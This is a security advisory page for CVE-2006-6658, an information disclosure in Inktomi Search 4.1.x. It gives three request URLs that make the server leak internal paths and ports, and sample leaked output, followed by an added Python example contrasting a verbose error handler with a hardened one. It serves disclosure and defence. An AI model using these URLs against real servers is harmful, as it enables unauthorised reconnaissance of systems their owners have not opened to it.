SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   HPE Autonomy Ultraseek (Inktomi Enterprise Search)
Vendors:   Autonomy
Inktomi Search Discloses System Information to Remote Users
SecurityTracker Alert ID:  1017242
SecurityTracker URL:  http://securitytracker.com/id/1017242
CVE Reference:   CVE-2006-6658
Updated:  Jun 2 2008
Original Entry Date:  Nov 16 2006
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 4.1.x; tested on 4.1.4
Description:   A vulnerability was reported in Inktomi Search. A remote user can obtain information from the target system.

A remote user can load the following URLs to obtain information from the target system:

http://[target]:8765/help/header.html
http://[target]:8765/topics.html
http://[target]:8765/thesaurus.html

The vendor was notified on November 16, 2006.

Juha-Matti Laurio reported that this vulnerability affects Inktomi Search.

[Editor's note: This vulnerability was originally reported by TippingPoint as affecting Verity Ultraseek, the successor product to Inktomi Search. See Alert ID 1017235 or CVE-2006-5819.]

Impact:   A remote user can obtain information from the target system.
Solution:   No solution was available at the time of this entry.

A fix for the successor product (Ultraseek) is available. The Ultraseek advisory is available at:

http://www.ultraseek.com/support/docs/RELNOTES.txt

Vendor URL:  www.autonomy.com/
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  Inktomi Search 4.x Scripts Information Disclosure Vulnerability


Inktomi Search versions 4.1.x are confirmed as affected by the Verity Ultraseek script
information disclosure vulnerability reported recently at
http://www.zerodayinitiative.com/advisories/ZDI-06-042.html

I have tested that using the following URL discloses the full path to the header.html file:
http://www.[domainnameremoved].fi:8765/help/header.html

The same results occur when testing with the following URLs outside of the Help directory:
http://www.[domainnameremoved].fi:8765/topics.html
and
http://www.[domainnameremoved].fi:8765/thesaurus.html

The tested version is 4.1.4, released in 2000. Other versions may also be affected.

Using these URLs, it is possible to disclose internal server information and port numbers.
Authentication is not required to exploit this vulnerability.

The vendor was contacted on 16 November 2006.

Vendor information:
Verity (part of Autonomy)

Solution:
Upgrade to supported Ultraseek version 5.7.

Test output of http://www.[domainnameremoved].fi:8765/help/header.html :

===
Internal Server Error
Server cannot complete operation

    exceptions.NameError: There is no variable named 'section'
      File header.html, line 4, in ?
        data = <code object ? at 01F33350, file "header.html", line 4>
        frag = ''
        htmlquote = <built-in function htmlquote>
        netloc = 'www.[domainnameremoved].fi:8765'
        parms = ''
        path = '/help/header.html'
        pathname = 'e:\\InktomiSearch4.1\\docs-[removed]\\help\\header.html'
        qs = ''
        query = {}
        realm = None
        scheme = 'http'
        self = <httpsrvr.RequestHandler ('xx.xxx.xxx.x', 2469)>
        server = <httpsrvr.Server ('', 8765)>
        thr = 3616
        urlquote = <method RequestHandler.urlquote of RequestHandler instance at 0
        wlines = [u'<html>\012', u'<head>\012', u'<title>', u'Internal Server Erro
        write = <method RequestHandler.write of RequestHandler instance at 0239C8C
        writeent = <method RequestHandler.writeent of RequestHandler instance at 0
      File httpsrvr.py, line 872, in handle
        data = <code object ? at 01F33350, file "header.html", line 4>
        frag = ''
        htmlquote = <built-in function htmlquote>
        netloc = 'www.[domainnameremoved].fi:8765'
        parms = ''
        path = '/help/header.html'
        pathname = 'e:\\InktomiSearch4.1\\docs-[removed]\\help\\header.html'
        qs = ''
        query = {}
        realm = None
        scheme = 'http'
        self = <httpsrvr.RequestHandler ('xx.xxx.xxx.x', 2469)>
        server = <httpsrvr.Server ('', 8765)>
        thr = 3616
        urlquote = <method RequestHandler.urlquote of RequestHandler instance at 0
        wlines = [u'<html>\012', u'<head>\012', u'<title>', u'Internal Server Erro
        write = <method RequestHandler.write of RequestHandler instance at 0239C8C
        writeent = <method RequestHandler.writeent of RequestHandler instance at 0
      File httpsrvr.py, line 925, in __init__
        client_address = ('xx.xxx.xxx.x', 2469)
        sckt = <socket._socketobject instance at 0244287C>
        self = <httpsrvr.RequestHandler ('xx.xxx.xxx.x', 2469)>
        server = <httpsrvr.Server ('', 8765)>
===

E.g. the following port numbers were listed: 2469, 2493, 2494

The domain name of the remote test server and the client IP address are hidden for security and privacy reasons.


Regards,
Juha-Matti Laurio
Finland
http://www.networksecurity.fi/
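The failure mode in the description and in the test output above is a template page that raises an exception when requested directly and an error handler that sends the failing frame's variables (file system path, listening port, client socket) to the remote user. The following Python is an added illustration, not code from Inktomi Search or from the reporter; it assumes, based on the traceback, that header.html is Python compiled and executed with request variables in scope and that 'section' is supplied only through normal navigation. It contrasts the verbose handler with one that keeps the detail in the server-side log.

```python
import logging
import traceback

# Constructed stand-in for a template page such as help/header.html (assumption:
# the page body is Python run with request variables as globals, and 'section'
# is absent when the page is fetched directly instead of via the help navigation).
HEADER_TEMPLATE = "write('<h1>' + htmlquote(section) + '</h1>')"

# Constructed request context, modelled on the variables in the advisory's output.
REQUEST_VARS = {
    "path": "/help/header.html",
    "pathname": "e:\\InktomiSearch4.1\\docs-example\\help\\header.html",
    "netloc": "search.example.invalid:8765",
    "client_address": ("192.0.2.10", 2469),
}


def _run_template(template_src, request_vars):
    """Execute the template with the request variables as its globals."""
    env = dict(request_vars)
    env["write"] = lambda s: None                        # output sink, discarded here
    env["htmlquote"] = lambda s: s.replace("<", "&lt;")  # minimal HTML escaper
    exec(compile(template_src, "header.html", "exec"), env)


def render_verbose(template_src, request_vars):
    """Vulnerable handler: any exception is reported to the HTTP client together
    with the request variables, which is what the advisory's test output shows."""
    try:
        _run_template(template_src, request_vars)
        return 200, "ok"
    except Exception as exc:
        lines = ["Internal Server Error", f"{type(exc).__name__}: {exc}"]
        lines += [f"    {k} = {v!r}" for k, v in sorted(request_vars.items())]
        return 500, "\n".join(lines)


def render_safe(template_src, request_vars, log=logging.getLogger(__name__).error):
    """Hardened handler: the same detail goes to the server-side log for the
    operator, while the client receives only a generic error page."""
    try:
        _run_template(template_src, request_vars)
        return 200, "ok"
    except Exception:
        detail = traceback.format_exc()
        detail += "\n".join(f"    {k} = {v!r}" for k, v in sorted(request_vars.items()))
        log("template failure for %s\n%s" % (request_vars.get("path"), detail))
        return 500, "Internal Server Error"
```

The operator still gets the path, port and socket details in the log, where they belong; the response body no longer carries them.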

Copyright 2019, SecurityGlobal.net LLC